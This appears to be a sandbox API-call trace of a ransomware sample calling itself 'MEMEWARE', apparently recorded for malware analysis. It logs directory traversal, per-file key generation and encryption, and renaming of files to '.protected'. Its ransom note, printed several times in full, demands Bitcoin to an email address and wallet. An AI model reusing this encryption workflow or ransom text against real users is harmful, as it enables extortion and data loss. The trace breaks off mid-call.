(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.765] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.765] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0077.766] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.766] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0077.766] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.766] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0077.766] CloseHandle (hObject=0x150) returned 1 [0077.767] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Windows") returned -1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Program Files") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="Program Files (x86)") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="$Recycle.bin") returned 1 [0077.767] lstrcmpiW (lpString1="SharedDataEvents", lpString2="System Volume Information") returned -1 [0077.767] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.767] StrStrIW (lpFirst="SharedDataEvents", lpSrch=".protected") returned 0x0 [0077.767] lstrcmpW (lpString1="SharedDataEvents", lpString2="RESTORE_FILES.txt") returned 1 [0077.767] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.767] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".txt") returned 0x0 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".rar") returned 0x0 [0077.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0077.768] StrStrW (lpFirst="SharedDataEvents", lpSrch=".zip") returned 0x0 [0077.768] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0077.792] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.792] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0077.792] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.792] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.793] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.793] CloseHandle (hObject=0x150) returned 1 [0077.793] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.protected") returned 93 [0077.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.protected")) returned 1 [0077.794] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Windows") returned -1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Program Files") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="Program Files (x86)") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="$Recycle.bin") returned 1 [0077.794] lstrcmpiW (lpString1="UserCache.bin", lpString2="System Volume Information") returned 1 [0077.794] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.794] StrStrIW (lpFirst="UserCache.bin", lpSrch=".protected") returned 0x0 [0077.794] lstrcmpW (lpString1="UserCache.bin", lpString2="RESTORE_FILES.txt") returned 1 [0077.794] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.794] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".txt") returned 0x0 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".rar") returned 0x0 [0077.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0077.795] StrStrW (lpFirst="UserCache.bin", lpSrch=".zip") returned 0x0 [0077.795] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.850] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.850] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.850] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.851] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.851] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.852] CloseHandle (hObject=0x150) returned 1 [0077.852] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.protected") returned 90 [0077.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.protected")) returned 1 [0077.853] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0077.853] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0077.853] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 84 [0077.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0077.853] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.853] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0077.854] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.854] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.854] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.854] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0077.854] CloseHandle (hObject=0x14c) returned 1 [0077.855] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0077.855] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0077.855] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 79 [0077.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0077.855] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.855] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0077.856] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.856] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0077.856] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.856] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0077.856] CloseHandle (hObject=0xd8) returned 1 [0077.856] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Windows") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Program Files") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="Program Files (x86)") returned -1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="$Recycle.bin") returned 1 [0077.856] lstrcmpiW (lpString1="Color", lpString2="System Volume Information") returned -1 [0077.856] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color") returned 59 [0077.856] lstrcmpW (lpString1="Color", lpString2=".") returned 1 [0077.856] lstrcmpW (lpString1="Color", lpString2="..") returned 1 [0077.857] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*") returned 61 [0077.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0077.857] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.857] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.857] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\.") returned 61 [0077.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.858] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\..") returned 62 [0077.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.858] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Windows") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Program Files") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="Program Files (x86)") returned -1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="$Recycle.bin") returned 1 [0077.858] lstrcmpiW (lpString1="ACECache11.lst", lpString2="System Volume Information") returned -1 [0077.858] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.858] StrStrIW (lpFirst="ACECache11.lst", lpSrch=".protected") returned 0x0 [0077.858] lstrcmpW (lpString1="ACECache11.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0077.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0077.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0077.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.858] StrStrW (lpFirst="ACECache11.lst", lpSrch=".txt") returned 0x0 [0077.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.859] StrStrW (lpFirst="ACECache11.lst", lpSrch=".rar") returned 0x0 [0077.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned 74 [0077.859] StrStrW (lpFirst="ACECache11.lst", lpSrch=".zip") returned 0x0 [0077.859] ReadFile (in: hFile=0x14c, lpBuffer=0x49f458, 